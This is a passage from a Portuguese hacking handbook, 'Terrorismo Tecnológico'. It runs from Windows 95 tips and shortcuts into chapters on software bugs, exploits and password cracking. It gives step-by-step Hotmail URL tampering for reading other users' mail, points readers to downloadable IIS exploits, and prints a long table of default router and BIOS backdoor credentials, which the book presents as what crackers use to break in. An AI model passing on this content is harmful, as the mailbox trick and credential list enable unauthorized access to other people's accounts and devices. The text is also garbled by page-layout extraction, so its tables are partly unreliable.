Retire a imagem que aparece ao iniciar o Windows 95 colocando a


linha logo=0 na seção [options] do arquivo MSDOS.SYS.

15.7.2 Fechando múltiplas janelas abertas

Para fechar múltiplas janelas abertas ao explorar Meu


Computador, aperte SHIFT e clique no botão "X" da primeira janela
que você quiser fechar. Todas as janelas precedentes serão
fechadas.

15.7.3 Abrindo sub-folders

Para ver as propriedades de um determinado objeto, aperte a


tecla ALT e dê um duplo clique nele.

15.7.4 Apagando um arquivo sem mandar para


Recycle (lixeira)

Se você apertar a tecla SHIFT ao apagar um arquivo ele não será


mandado para o Recycle ao ser apagado.

15.7.5 Diretório de Startup

Para executar um programa sempre que iniciar o Windows, coloque


um shortcut dele no diretório \windows\Start
Menu\Programs\Startup.
Terrorismo Tecnológico 277
Aprenda Para Sobreviver

15.7.6 Explorer não mostra todos os arquivos

Se o Explorer não mostra todos os arquivos de um diretório,


selecione View/Options e marque "Show all files".

15.7.7 Explorer não mostra as extensões de alguns


arquivos

Se o Explorer não mostra as extensões de alguns arquivos,


selecione View/Options e desmarque "Hide MS-DOS file extensions
for file types that are registered"

15.7.8 Tocando CD automaticamente

O Windows 95, por default sempre toca automaticamente o CD que


é colocado no CD-ROM. Para alterar isto, abra o menu View no
Explorer, selecione Options e então File Type. Procure Audio CD e
selecione Edit...Retire a opção /play da linha de aplicação usada.

15.7.9 Arrastando objetos com botão da direita

Arrastar objetos usando o botão da direita funciona do mesmo


modo que usando o botão da esquerda, só que aparece um menu
onde você pode selecionar se que copiar, mover ou criar um
shortcut do objeto.

15.7.10 Forçando copiar ou mover


Terrorismo Tecnológico 278
Aprenda Para Sobreviver

Arrastar um objeto com o botão da esquerda não funciona da


mesma maneira sempre. Por exemplo, se você arrasta um arquivo
de um folder para outro em um mesmo disco, ele será movido. Se o
folder de destino for em outro disco o arquivo será copiado. Se o
arquivo arrastado for executável, o que será transferido será um
shortcut do arquivo. Para forçar a cópia de um arquivo,
aperte CTRL ao arrastar o arquivo. Para forçar a movimentação do
arquivo, aperte SHIFT ao arrastar o arquivo. Lembre-se de soltar a
tecla do mouse antes de soltar o CTRL ou SHIFT. Em qualquer dos
casos é interessante observar o cursor para verificar o que ele está
fazendo. Ao copiar, aparecerá um (+) junto ao cursor. Ao mover,
nada aparecerá e quando for criado um shortcut, aparecerá uma
seta junto ao cursor.

15.7.11 Copiando e movendo arquivos

Clique o botão da direita no arquivo ou folder que você deseja


copiar ou movimentar e selecione cut para movimentar ou copy
para copiar.
Em seguida, selecione o folder de destino, clique o botão da direita
sobre ele e selecione paste.

15.7.12 Desligando o NumLock

Por default o Windows 95 deixa o NumLock ligado. Para que ele


fique desligado coloque a linha "numlock=off" no CONFIG.SYS.

15.7.13 Verifivando o tamanho de um folder


Terrorismo Tecnológico 279
Aprenda Para Sobreviver

Para saber o tamanho total de um folder (incluindo sub-folders)


verifique suas propriedades (botão direito, propriedades ou ALT-
ENTER ou ALT-Duplo clique)

15.7.14 Modificando os logos do Win95

Você pode modificar os logos apresentados ao entrar ou sair do


Win95. Crie figuras no formato *.bmp no tamanho 320x400, 256
cores, e dê os nomes de logo.sys (apresentado ao entrar no Win95),
logow.sys (ao ser dado o shutdown) e logos.sys (quando pronto
para desligar). Coloque estes arquivos na raiz do disco de boot.

15.7.15 Recortar,marcar e colar

Uma dica muito interessante e útil, e que eu uso o tempo todo, é


marcar um texto e guardá-lo na memória. Faça o seguinte: segure
Shift e use as setas do teclado para marcar o texto - ou use o botão
direito do mouse - você pode selecionar partes de um texto, linhas
ou apenas palavras. Estando o texto selecionado segure Ctrl e
aperte shift, agora o texto está na memória e pode ser colado em
qualquer programa usando shift+insert. Eu uso muito este recurso
durante programação ou quando estou nos chats.

15.7.16 Acelere o Desempenho do seu Windows 95

Para aumentar o desempenho do seu Windows 95 troque os drivers


gráficos padrões do Windows 95 para os novos drivers mais
recentes dos fabricantes de sua placa gráfica. Segundo a Windows
Computing fazendo isso você terá um aumento de desempenho da
ordem de 10%. A Microsoft nunca foi boa em desenvolver drivers
para seus sistemas operacionais, e os drivers dos fabricantes em
Terrorismo Tecnológico 280
Aprenda Para Sobreviver

sua maioria são superiores aos drivers da Microsoft. Também


devemos levar em conta que os fabricantes de hardware tiveram
mais de 6 meses para extrair o melhor desempenho do Windows 95.
Já que estamos falando de placas gráficas, se você está pensando
em trocar a sua placa gráfica por outra, certamente você deverá
fazer certas considerações como: pense em adquirir uma placa
aceleradora gráfica, esta placa livra o trabalho daCPU
além de aumentar a performance. Também pense em memória
VRAM ao invês da DRAM, compre com no mínimo 2 Mb para sua
placa gráfica, memória VRAM é mais cara mas também é muito
mais rápida. A placa gráfica ideal seria aceleradora PCI com 2 Mb
de VRAM. Não se esqueça de verificar se esta placa é compatível
com Plug & Play e está no Hardware Compability List da Microsoft.

15.7.17 Atualizando de 4 Mb para 8 Mb de RAM

Se você instalou o Windows 95 em um computador com 4 Mb de


RAM e agoraatualizou seu sistema para 8 Mb de RAM, para tirar o
máximo doWindows 95 é necessário re-instalar seu Windows 95. A
razão para isto é que o programa de instalação do Windows 95
instala diferentes arquivos para computadores com 4 Mb de RAM e
8 Mb de RAM;

15.7.18 Delete Arquivos Imediatamente

Quando você pressiona a tecla SHIFT enquanto move arquivos


para a lixeira, estes arquivos serão deletados imediatamente. Tenha
cuidado ao utilizar esta opção para não deletar um arquivo (ou
grupo de arquivos acidentalmente. Pressionando Shift+Del você
obtém o mesmo efeito.
Terrorismo Tecnológico 281
Aprenda Para Sobreviver

15.7.19 Desinstalando o Windows 95

Inicie o Windows 95 pelo diskete de sistema do mesmo, e digite:


"A:\Unistall", isso pode ser feito também, iniciando o Windows 95
normalmente, e executando o mesmo comando pelo Windows 95.

15.7.20 Configurando o Autoplay para CDs de música

Por padrão, o Windows 95 é configurado para começar o CD Player


e tocar os CDs de música assim que inseridos no drive. Para mudar
isso, vá no Windows Explorer, menu Exibir/Opções.../Tipos de
Arquivos. Selecione "Audio CD" e clique em Editar. Na lista de
ações, selecione "Play" e clique em editar.
Agora, escreva na caixa de texto a linha de comando para chamar o
programa que você quer usar para tocar seus CDs. Se você apagar
por completo a linha, nada acontecerá quando você inserir um CD
de música no drive.

15.7.21 Fechando várias pastas de uma só vez

Se você abriu várias pastas e agora quer fechar todas, o modo


mais fácil de fazê-lo é segurando Shift enquanto fecha a última
janela (clicando no X no canto superior direito da janela.)

15.7.22 Abrindo o Prompt do MS-DOS em um diretório


específico

Para abrir o Prompt do MS-DOS direto em um diretório que você


Terrorismo Tecnológico 282
Aprenda Para Sobreviver

quiser, vá no Explorer, selecione o diretório, agora vá no menu


Iniciar, Executar, digite Command e pressione OK.

15.7.23 Usando nomes de arquivos longos no Prompt


do MS-DOS

Você pode usar nomes de aruqivos longos em janelas DOS, basta


colocar o nome entre aspas. Exemplo: cd "Arquivos de Programas"

15.7.24 Reiniciando o Windows sem reiniciar todo o


computador

Quando você precisar reiniciar o Windows para completar a


instalação de algum programa, eis como fazê-lo sem ter que reiniar
o computador e esperar toda a seqüência de boot: Clique no Menu
Iniciar, Desligar. Escolha Reiniar o Computador. Agora, mantenha a
tecla Shift pressionada, enquanto clica no botão OK. Pronto, seu
Windows será reiniciado!

15.7.25 Problema de Esvaziamento da Pilha (Memória


Vazante)

Quando você navega na Internet durante um periodo mais longo,


seu Windows 95pode acusar falta de memória no sistema. Trata-se
de um problema do sistema operacional chamado vazamento de
memória. Para corrigi-lo, instale o programa Kernel 32 Update.

15.7.26 Botão Iniciar


Terrorismo Tecnológico 283
Aprenda Para Sobreviver

Aquele botão pode ser colocado em qualquer posição dentro da


barra! Clique Clique no botão e pressione as combinações de teclas
"Alt + -". No menu que aparece, escolha a opção Mover. Agora use
as teclas com setas de direção para movimentar o botão Iniciar.
Esse truque só funciona se a opção Auto-ocultar da barra de
tarefas estiver desativada.

15.7.27 Propriedades

No Windows 95, para obter rapidamente as propriedades de


qualquer arquivo, dê um duplo clique nele enquanto você mantém
precionada a tecla Alt.

15.7.28 Evitando ter que reiniciar o computador

Se você, por algum motivo, escolher para desligar o computador e


depois lembrar-se que precisa fazer mais alguma coisa, você pode
simplesmente digitar 'WIN' quando a tela "Seu computador já pode
ser desligado com segurança" aparecer. Se quiser ir para o prompt
do DOS, simplesmente digite'MODE CO80'. Isso acontece porque o
Windows apresenta uma tela gráfica, mas, na verdade, ele está em
um normal Prompt do DOS.

15.7.29 Impressão Rápida

No Windows 95, arquivos registrados no sistema (DOC, BMP etc...)


podem impressos sem abrir o programa que os criou. Para executar
essa tarefa, ser selecione os objetos desejados, clique neles com o
botão direito do mouse e escolha Imprimir. Obs: Isso só funciona
com aplicativos de 32 bits.
Terrorismo Tecnológico 284
Aprenda Para Sobreviver

15.7.30 Renomeando a Lixeira do Windows 95

Abra o Registro, executando o arquivo Regedit.exe. No menu


Editar, selecione a opção Localizar, na tela que surge, digite a
palavra Lixeira e espere alguns segundos. Quando o Win95
encontrar o texto, aparecerá, na parte direita da tela, o seguinte:
(Padrão) "Lixeira". Dê um duplo clique nessa opção. Agora é só
renomear a Lixeira para a designação que você achar mais
adequada. A mudança só terá efeito depois que você reiniciar o
Windows 95.

15.7.31 Teclas de Atalho

F2 Renomear

F3 Localizar

CTRL+X,C,V Recortar, Copiar ou Colar

SHIFT+DELETE Excluir imediatamente sem colocar o arquivo na


Lixeira.

ALT+ENTER Propriedades

ALT+clique duplo Propriedades

CTRL+clique direito Colocar verbos alternativos no menu contextual


Abrir com

SHIFT+ clique duplo Explorar o objeto se houver um comando


Explorar
Terrorismo Tecnológico 285
Aprenda Para Sobreviver

CTRL+arrastar um arquivo até uma pasta Copiar um arquivo

CTRL+SHIFT+arrastar um arquivo até a área de trabalho ou uma


pasta Criar um atalho

CTRL+ESC,ESC,TAB, SHIFT+F10 Abrir propriedades da barra de


tarefas

Controle geral sobre pastas/Windows Explorer

F4 (Explorer) Exibe a caixa de combinação

F5 Atualiza

F6 Alterna entre painéis no Explorer

CTRL+G (Windows Explorer) Ir para

CTRL+Z Desfazer

CTRL+A Selecionar tudo

BACKSPACE Vai para a pasta pai

SHIFT+<fechar> Fecha esta pasta e todas as suas pastas pais

No Windows Explorer

Num* Expande tudo sob a seleção


Terrorismo Tecnológico 286
Aprenda Para Sobreviver

Num- Expande a seleção

Num+ ou Seta à direita Reduz a seleção

Seta à direita Expande a seleção atual, se estiver reduzida; caso


contrário, vai para a primeira pasta filha Seta à esquerda Reduz a
seleção atual, se estiver expandida; caso contrário, vai para a pasta
pai

Em Propriedades

CTRL+TAB/CTRL+SHIFT+TAB Alterna entre guias Propriedades

Nas caixas de diálogo normais Abrir/Salvar

F4 Abre a lista de locais

F5 Atualiza a tela

Backspace Vai para a pasta pai se o foco estiver na janela de


visualização

Comandos gerais apenas de teclado

F1 Ajuda

F10 Modo Vai para Menu

SHIFT+F10 Menu contextual para o item selecionado


Terrorismo Tecnológico 287
Aprenda Para Sobreviver

CTRL+ESC Acessa o menu Iniciar

CTRL+ESC, ESC Foco no botão "Iniciar"

SHIFT+F10 Menu contextual

ALT+TAB Alternar para o programa em execução

SHIFT enquanto insere o CD Ignora auto-execução

Alt+M quando o foco está na barra de tarefas Minimiza todas as


janelas

Teclas de acessibilidade

Tocar SHIFT 5 vezes Liga/desliga Teclas de Aderência Manter


pressionada

SHIFT Direita por8 segundos Liga/desliga Teclas de Filtragem


Manter pressionada NumLock por 5 segundos Liga/desliga Teclas
de Alternação

ALT Esq+SHIFT Esq +NumLock Liga/desliga Teclas do Mouse

ALT Esq+SHIFT Esq+PrintScreen Liga/desliga AltoContraste

Teclado MS Natural Keyboard

Win+R Caixa de diálogo Executar


Terrorismo Tecnológico 288
Aprenda Para Sobreviver

Win+M Minimizar Tudo

SHIFT-Win+M Desfazer Minimizar Tudo

Win+F1 Ajuda do Windows

Win+E Explorer

Win+F Localizar Arquivos ou Pastas

CTRL+Win+F Localizar Computador

Win+Tab Alternar entre os botões da barra de tarefas

Win+Break Tecla aceleradora de PSS... (propriedades de Sistema)

Evitando que os últimos arquivos abertos sejam mostrados no


menu Documentos Normalmente, não há como fazer isso, mas há
um meio que resolve o problema: Primeiro, saia para o modo MS-
DOS. Normalmente, os documentos são guardados na pasta
\WINDOWS\RECENT. No DOS, apague a pasta RECENT. Por
último, crie no diretório \WINDOWS um arquivo chamado RECENT,
pois tendo um arquivo com o mesmo nome no mesmo diretório o
Windows não poderá recriar a pasta assim que for iniciado.

15.7.32 Mudando o Ícone do MENU INICIAR

Copie com outro nome o arquivo USER.EXE que se encontra no


diretório "C:\Windows\System" e abra o mesmo num editor de
Ícones qualquer, e mude os ícones (de todos os tamanhos), depois
copie o arquivo modificado para o mesmo diretorio. OBS: Faça
backup do arquivo entes de apagá-lo.
Terrorismo Tecnológico 289
Aprenda Para Sobreviver

15.7.33 Um menu iniciar ideal

Comece tirando proveito de algumas configurações rápidas para


personalizar o menu iniciar- não é necessária nenhuma edição do
registro para este truque. Primeiro, inclua as pastas painel de
controle, impressoras, rede dial-up, e lixeira no menu inicar. Para
incluir esses itens vc precisa manipular os indentificadores de
classe( ou CLSIDs), longas sequencias de números e letras que
indentificam cada item do registro. O CLSDI do painel de controle é
{21ec2020-3aea-1069-a2dd-08002b30309d}; da pasta de
impressoras é {2227a280-3aea-1069-a2de-08002b30309d}; do
acesso à rede dial up é {992cffa0-f557-101a-88ec-00dd010ccc48} e
da lixeira é {645ff040-5081-101b-9f08-00aa002f954e}.
Para incluir o painel de controle no menu iniciar faça o seguinte:
Abra o windows explorer, e crie uma nova pasta no diretório
windows\menu iniciar chamada Painel de Controle
rápido.{21ec2020-3aea-1069-a2dd-08002b30309d} exatamente
como está aqui, somente o nome antes do ponto pode ser trocado,
o resto NÂO! Para vc fazer com os outros, siga os mesmos passos,
mais com o número dele.

15.7.34 Explorer no meu computador!

Dê um clique duplo no ícone Meu Computador para exibir as


unidades de seu PC, impressoras e painel de controle. Não seria
agradável se vc desse um clique duplo em meu computador e
aparecesse algo útil como o explorer do windows? É fácil fazer isso:
Primeiro clique em iniciar/executar e digite isso: regedit ; Depois de
ter entrado nele, no lado esquerdo, expanda essas janelas:
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-
08002B30309D}\SHELL. De um clique com o botão dieito e escolha
Terrorismo Tecnológico 290
Aprenda Para Sobreviver

novo " chave, Digite open e presione enter. Dê um clique com o


botão direito em open e escolha novo " chave. Digite command e
presione enter. Dê um duplo clique em (padrão), digite: explorer
/e,c:\windows e pressione enter! Lembrando que a pastinha meu
computador, vai parar de funcionar, até vc remover o negócio da
pasta!

15.7.35 Visualizar arquivos

Rápido! encontre aquele imagem para a apresentação!!! Não


consegue lembrar o nome do arquivo? Eis uma ajuda que pode
ajudar a acha-lo. Abra o registro para mudar o ícone padrão dos
arquivos .BMP para uma visualização instantãnea do conteúdo (
como acontece em sistemas macintosh). Localize essa chave:
HKEY_CLASSES_ROOT/PAINT.PICTURE\DEFAULTICON. Altere
o valor padrao para %1. Inicie o explorer e vc verá todas as imagens
.BMP aparecerem em pequenininho!

15.7.36 Como trocar os ícones do Meu Computador e


Lixeira?

Para alterar o ícone do meu computador faça o seguinte: abra o


registro e localize essa chave:
HKEY_CLASSES_ROOT\CLSID\{200D04FE0-3AEA-1069-A2D8-
08002B30309D}\DEFAULTICON. De um duplo clique em (padrão) e
coloque o ícone que deseja expecificando onde está o icone
desejado. Para trocar o ícone da lixeira é um pouco mais
complicado, porque dentro do registro tem 3 valores : (padrão),
empty e full. Quando a lixeira está vazia, o ícone empty (vazio) é
armazenado no (padrão), e qundo tá cheio o ícone full (cheio)
tambem é armasenado no (padrão), então tende-se certificar de que
ambos estejam corretos. Vou mostrar uma foto com minha lizeira
vazia e mostrar. Para trocar o ícone, esvazie sua lixeira, e entre no
regitro, depois vá até aqui :HKEY_CLASSES_ROOT\CLSID
Terrorismo Tecnológico 291
Aprenda Para Sobreviver

{645FF040-5081-101B-9F08-00AA002F954E}\DEFAULTICON.
Depois vc coloca o caminho dos ícones vazis, no (padrão) e no
empty, depois o ícone cheio no valor full e pronto, depois vc tem de
reiniciar!

15.7.37 As pessoas podem ler meu e-mail?

Sim, podem. Agora, isso não significa que há sempre alguém lendo
a sua correspondência. Com milhões de pessoas na Internet, as
novas mensagens individuais se perdem na multidão. Mas como
você sabe, quando uma mensagem parte do seu sistema, ela pode
chegar a um outro computador localizado a centenas e até milhares
de quilômetros de distancia, e você não tem como saber quem tem
acesso a ela. Mesmo que ninguém leia a sua correspondência
enquanto esta estiver em trânsito, o destinatário poderá encaminhá-
la a quem bem desejar. Mas nem tudo está perdido - existem
maneiras de tornar o seu e-mail mais seguro. Uma delas consiste
em criptografar a sua mensagem antes de enviá-la. Criptografar
significa simplesmente transformá-la em uma seqüência de códigos
que só podem ser decifrados com a chave apropriada. Ao ser
recebida, a mensagem deverá ser descriptografada no equipamento
destinatário. Enviar mensagens pelo Netscape 2.02 e Internet
Explorer 2 é relativamente seguro. Não sou hacker! Sou somente
uma pessoa que adora computadores há muito tempo e com a
Internet teve a chance de disponibilizar informações sobre
informática para outras pessoas e assim haver a troca de
informações. Também sou absolutamente contra a pirataria, ou seja
a cópia de programas. Legalize sua cópia pirata! Também não
existe nenhum livro ou material específico em como ser tornar um
hacker. Não existe uma fórmula mágica e nem como se tornar um
hacker do dia para a noite. Um hacker se faz após anos de muita
leitura e estudo. Basicamente toda a informação que você necessita
para se tornar um hacker já está disponível na rede, o que você tem
que fazer é vasculhar e achar as informações. Está certo que isto
não é uma tarefa muito fácil, mas quem disse que ser um hacker é
Terrorismo Tecnológico 292
Aprenda Para Sobreviver

fácil? Qualquer um pode ser um hacker ou médico ou engenheiro ou


etc. Desde que você se informe e estude.
Terrorismo Tecnológico 293
Aprenda Para Sobreviver

Capítulo XVI

BUGS - Falhas
Terrorismo Tecnológico 294
Aprenda Para Sobreviver

16.1 Introdução

Todos os sistemas possuem falhas sendo S.O., aplicativos,


banco de dados...
Elas consistem em pequenos erros na criação e compilação dos
programas, possibilitando que crackers os utilizem para tomar o
controle de alguma máquina ou pelo menos causar uma desordem.
Essas falhas por mais insignificantes que possa parecer podem
comprometer a segurança de uma rede inteira.
O grande perigo é o administrador que não tem consciência e
não faz as atualizações que são tão necessárias.

16.2 Como surge o bug

A máquina não erra e sim o homem. O bug, ou falha, surge a


partir do momento que o programador comete um erro. Por serem
pequenos erros estes passam despercebidos e só são descobertos
por algum hacker ou analista de segurança.
Os erros do Windows, por exemplo. As grandes maiorias das
falhas descobertas são feitas pelos próprios usuários do sistema
operacional. Os criadores mesmo que têm o código fonte e
conhecem o programa como a palma da mão raríssimas vezes
percebem algum erro. Para ser mais seguro, um programa têm que
ser testado de todas as maneiras possíveis. Coisa que não fazem
mais hoje, pois o custo aumenta e as empresas querem lançar logo
o software no mercado.

Surge então aquele irritante aviso que o programa fez uma


operação ilegal
Terrorismo Tecnológico 295
Aprenda Para Sobreviver

16.3 Exemplos de falhas

O Windows 98 possui muitos erros e poe muitos nisso, mas três


são interessantes. O primeiro é que não consegue executar nem
abrir nenhum link com a url c:\con\con . Se você tentar ir a iniciar e
executar, o sistema travará e mostrará a famosa tela azul. Os outros
dois são do netbios. O primeiro possibilita que você acesse o
diretório system do Windows por um compartilhamento de
impressora. É só mapear o compartilhamento padrão printer$. O
último possibilita que se descubra a senha do netbios sabendo
apenas o primeiro caractere. Por exemplo: coloco no disco C
compartilhado a senha macas. Se alguém tentar o primeiro m já
consegue acesso à minha rede. O Windows 2000 também possui
algumas falhas, como deixar o netbios ativo em sua instalação.
Saindo um pouco dos sistemas operacionais, alguns programas
também possuem falhas graves.
Erros de Active X possibilitam que ao visitar um site, o Internet
Explorer instale um programa no seu computador e o execute sem
que você perceba. Preocupa-se em não abrir anexos de e-mail?
Erros no Outlook fazem com que só de receber os e-mails os
anexos sejam executados automaticamente. No Outlook XP
tentaram resolver este problema bloqueando a maioria dos anexos
recebidos, resultado você recebe um e-mail com algo urgente e ele
fica bloqueado e você perde seus anexos, que inteligente não é?
Até existe formas de desbloquear, mas deveria ser mais fácil e não
coisa apenas para um admistrador e sim pra qualquer usuário. O
Internet Information Server, servidor de homepages da Microsoft,
possui erros graves. Unicode, RDS, existem muitos. Um mais
recente é uma falha no printer.isapi, fazendo com que se consiga
acesso ao Windows 2000 pelo IIS 5.0 . O sistema Unix possui
muitas falhas também, como no sendmail provavelmente o maior
bug de todos e no Apache, mas é mais fácil exemplificar usando o
maravilhoso sistema de Bill Gates. Um truquezinho: abra o Word,
digite a função =rand(100,100) e aperte enter. Você entendeu algo
do aparece no Word após dar enter?
Terrorismo Tecnológico 296
Aprenda Para Sobreviver

16.4 Buffer overflows

O buffer overflow é um ataque usado há muito tempo e que ainda


será muito usado. Compreende em lotar os buffers (memória
disponível para aplicativos) de um servidor e incluir na sua lista de
processos algum programa tal como um keylogger ou um trojan.
Todos os sistemas são vulneráveis a buffer overflows e a solução é
a mesma, procurar se já existem correções existentes. Novo buffer
overflows surge todo dia, até o XP já têm alguns.

16.5 Race condition

O Race condition ou condição de corrida é mais comum no Unix


e no Linux. Consiste em fazer algum programa que rode como root
(superusuário) executar alguma falha que possa lhe enviar para o
shell do sistema. O programa que mais teve problemas de race
condition até hoje é o sendmail , serviço de e-mail padrão do Unix. É
possível encontrar falhas até em versões mais recentes.

16.6 Descobrindo se alguns sistemas têm falhas

Utilizando recursos de debug que checam por erros de buffer


overflow e outros, mas isso é coisa para um bom programador, já
para o usuário é bem mais difícil descobrir algo. O interessante seria
visitar páginas especializadas no assunto, que o cada dia publicam
novos tipos de erros descobertos. Algumas muito boas são a
Security-focus (www.security-focus.com) em inglês.
Terrorismo Tecnológico 297
Aprenda Para Sobreviver

16.7 Utilizando exploits

Exploits são programas criados para explorar falhas. O exemplo


do printer .isapi do IIS 5.0, possui um exploit chamado iishack2000.
Possibilita que somente digitando o IP de algum computador,
consiga acesso direto ao interpretador de comandos (ou shell).
Assim podendo fazer o que quiser com o sistema. Existe também o
iishack (sem o 2000), que utiliza um erro de buffer overflow do IIS
4.0 para fazer com que possa mandar o servidor executar qualquer
tarefa (como um trojan). Cada exploit corresponde a uma falha, por
isso geralmente os grandes sites de segurança publicam os dois
juntos. Geralmente vêm em código-fonte C, Perl e alguns poucos
em executáveis comuns.
Dicas: Compiladores para rodar os exploits em
www.programmersheaven.com.
Exploit que checa mais de 200 vulnerabilidades de Unicode (IIS),
no site: http://tomktech.n3.net.

16.8 No Linux
O linux também tem muitos erros, só no primeiro trimestre de 2003
foram descobertos mais de 500 bugs diferentes.
Uma falha na biblioteca para compressão de software utilizada em
todas as versões do Linux pode deixar a parte principal do sistema
suscetível a ataques de hackers.
O bug, conhecido como buffer overflow (sobrecarregamento de
buffer), leva as funções principais do gerenciamento de memória no
zlib a falharem e, nesta condição, permite que pessoas com
conhecimento técnico aperfeiçoado assumam o controle de
computadores Linux via Internet.
A vulnerabilidade afeta qualquer versão do Linux que utilize a
biblioteca zlib para descompressão, incluindo o software principal do
sistema operacional - o kernel.
Terrorismo Tecnológico 298
Aprenda Para Sobreviver

Segundo sites especializados, pacotes incluindo X11, rsync, QT,


gcc, vnc, Mozilla e muitos outros programas que têm a capacidade
de utilizar o método de compressão estão potencialmente
vulneráveis.

16.9 Correção

Depois de perceberem erros, alguns S.O. como o XP envia a


Microsoft como ocorreu o erro, assim os programadores podem
fazer correções e essas são distribuídas. São os famosos patches
ou Service Pack. Toda vez que um erro for descoberto deve-se
visitar a página do fabricante do programa e pegar a correção. Isso
não pode ser feito a cada determinados tempos como 6 meses ou a
cada dois meses, mas é no máximo uma em uma semana.
A Microsoft (www.microsoft.com.br) , a Securenet
(www.securenet.com.br) e a Anti-Hackers homepage
(www.hackers.com.br) possuem algumas listas e grupos de
informações a respeito dos bugs.

16.10 Outros Bugs

Os bugs como são erros de linguagem podem também ocorrer


com paginas da Internet vejamos um encontrado no Hotmail:
** Faça como teste em outra caixa de mensagens sua já que é
ilegal ler mensagens de outras pessoas!

Entre no hotmail e log-se normalmente com seu ID e SENHA


Terrorismo Tecnológico 299
Aprenda Para Sobreviver

Para ler menssagens de outra caixa use o link.

http://pv2fd.pav2.hotmail.msn.com/cgi-
bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e3
6%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG99
8047250%2e22%26start%3d9702%26len%3d96
87%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login
%3dusername%26domain%3dhotmail%2ecom&
hm___fl=attrd&domain=hotmail.com

Pare este ler mude os seguintes textos do url :

MSG943322803%2e16 (Número ID da menssagem simplesmente


conte como %2e=.) username (O usuário que você queira ler a
menssagem)

Se você quiser ler e-mails como "e-mailbox view"ao invés de visão


completa.

remova = "%26raw%3d0"

Se você não gosta do frame do hotmail em cima.

remova "&hm___fl=attrd&domain=hotmail.com"
Terrorismo Tecnológico 300
Aprenda Para Sobreviver

Capítulo XVII

Crackeando
Terrorismo Tecnológico 301
Aprenda Para Sobreviver

17.1 Wordlists

São listas com usuários e senhas. Quando se têm arquivos de


senha do UNIX com o sistema de criptografia DES a criptografia é
inquebrável, porém programas como Cracker Jack pegam um
arquivo criado “wordlists” listas de senhas comuns o criptografa
utilizando o mesmo sistema das senhas de Unix (DES) e compara
os arquivos.
Se o programa encontrar algum usuário em que a criptografia
tenha ficado exatamente igual, isso é que a senha funciona o nome
lhe é informado. As palavras são colocadas verticalmente, uma em
cada linha.
Carro
Mato
1234
55479
...

17.2 O processo de bruteforce

O método da força bruta deve ser o melhor de todos. Mas pode


levar horas, e às vezes dias para conseguir uma resposta.
Utiliza-se um programa que tenta conectar-se a um sistema
utilizando todas as combinações possíveis de letras e números. Ele
gera isso. Digamos que você peça para ele combinar os números
0,1,2,3,4,5,6,7,8,9 ele fará todas as combinações possíveis ate
encontrar a senha. Mas um cracker que possui uma conexão de 56
kbps e utiliza um Pentium III, ou até um Pentium IV é muito
complicado que consiga descobrir a senha. Para se ter alguma
chance deve-se utilizar uma conexão dedicada (à cabo, via rádio e
outras) e vários computadores, por exemplo, em uma universidade
onde tem muitos computadores numa sala e com uma Internet bem
veloz. Tendo 20 computadores rápidos trabalhando cada um em um
Terrorismo Tecnológico 302
Aprenda Para Sobreviver

setor (um tentando descobrir senhas começadas por a, o outro por


b, o outro por c,...) o tempo para se conseguir a senha diminuirá
consideravelmente.
Já localmente é claro que o tempo é bem mais rápido.

O aplicativo CAIN, ShadowScan, Brutus e NAT (Netbios


Auditing Tool) são os melhores!

17.3 Tabela completa

Agora mostrarei uma lista bem grande e ela DE FORMA ALGUMA


deve ser deixada de lado. Pois se deve checá-la para ver se o seu
sistema está vulnerável, caso estiver troque esta senha o mais rápido o
possível. É para ser usada para roteadores e outros dispositivos que
possuam senhas. (anteriormente já mostrei uma tabela com as
principais senhas, mas eram as principais, aqui está à tabela completa,
que os cracker utilizam para invadir e roubar as informações
diretamente do roteador, sendo assim nunca pegos pelos agentes de
segurança cuidado então!)

Fabrican Produto Re Protocolo Usuário Senha Nível


te vis de
ão acesso
3COM CellPlex 700 Telnet tech tech
0
3COM CoreBuild 700 Telnet debug synnet
er 0/6
000
/35
00/
250
0
Terrorismo Tecnológico 303
Aprenda Para Sobreviver

3COM CoreBuild 700 Telnet tech tech


er 0/6
000
/35
00/
250
0
3COM HiPerARC v4. Telnet adm (none)
1.x
3COM LANplex 250 Telnet debug synnet
0
3COM LANplex 250 Telnet tech tech
0
3COM LinkSwitc 200 Telnet tech tech
h 0/2
700
3COM Office 5x0 Telnet n/a PASSW Admin
Connect ORD
ISDN
Routers
3COM NetBuilder SNMP n/a ANYCO
M
3COM SuperStac 220 Telnet debug synnet
k II Switch 0
3COM SuperStac 270 Telnet tech tech
k II Switch 0
3COM SuperStac 110 Telnet monitor monitor Monitor
k II Switch 0/3
300
3COM SuperStac 110 Telnet manager manage Manage
k II Switch 0/3 r r
300
3COM SuperStac 110 Telnet admin (none) Admin
k II Switch 0/3
300
3COM SuperStac 110 Telnet security security Admin
k II Switch 0/3
300
3COM Telnet adm (none)
3COM Telnet admin synnet
3COM Telnet manager manage
r
3COM Telnet monitor monitor
3COM Telnet read synnet
3COM Telnet security security
3COM Telnet write synnet
Accelera DSL CPE Telnet sysadm anicust
ted and
Network DSLAM
s
ADC Pacesette Telnet n/a secret
Kentrox r Router
Adtran MX2800 Telnet n/a adtran
Advance PC BIOS Console n/a Advanc Admin
Terrorismo Tecnológico 304
Aprenda Para Sobreviver

d e
Integrati
on
Alteon ACEswitc 180 HTTP admin admin Admin
h e
Alteon ACEswitc 180 Telnet admin (none)
h e
AMI PC BIOS Console n/a AM Admin
AMI PC BIOS Console n/a AMI Admin
AMI PC BIOS Console n/a A.M.I Admin
AMI PC BIOS Console n/a AMI_S Admin
W
AMI PC BIOS Console n/a AMI?S Admin
W
AMI PC BIOS Console n/a aammii Admin
AMI PC BIOS Console n/a AMI!SW Admin
AMI PC BIOS Console n/a AMI.KE Admin
Y
AMI PC BIOS Console n/a AMI.KE Admin
Z
AMI PC BIOS Console n/a AMI~ Admin
AMI PC BIOS Console n/a AMIAMI Admin
AMI PC BIOS Console n/a AMIDE Admin
COD
AMI PC BIOS Console n/a AMIPS Admin
WD
AMI PC BIOS Console n/a amipsw Admin
d
AMI PC BIOS Console n/a AMISET Admin
UP
AMI PC BIOS Console n/a BIOSPA Admin
SS
AMI PC BIOS Console n/a CMOSP Admin
WD
AMI PC BIOS Console n/a HEWIT Admin
T RAND
Amptron PC BIOS Console n/a Polrty Admin
Apache Apache HTTP n/a SDGRO User
Project "jj" script CKS
APC MasterSwi AP apc apc Admin
tch 921
0
APC SNMP 2.x apc apc
Adapter
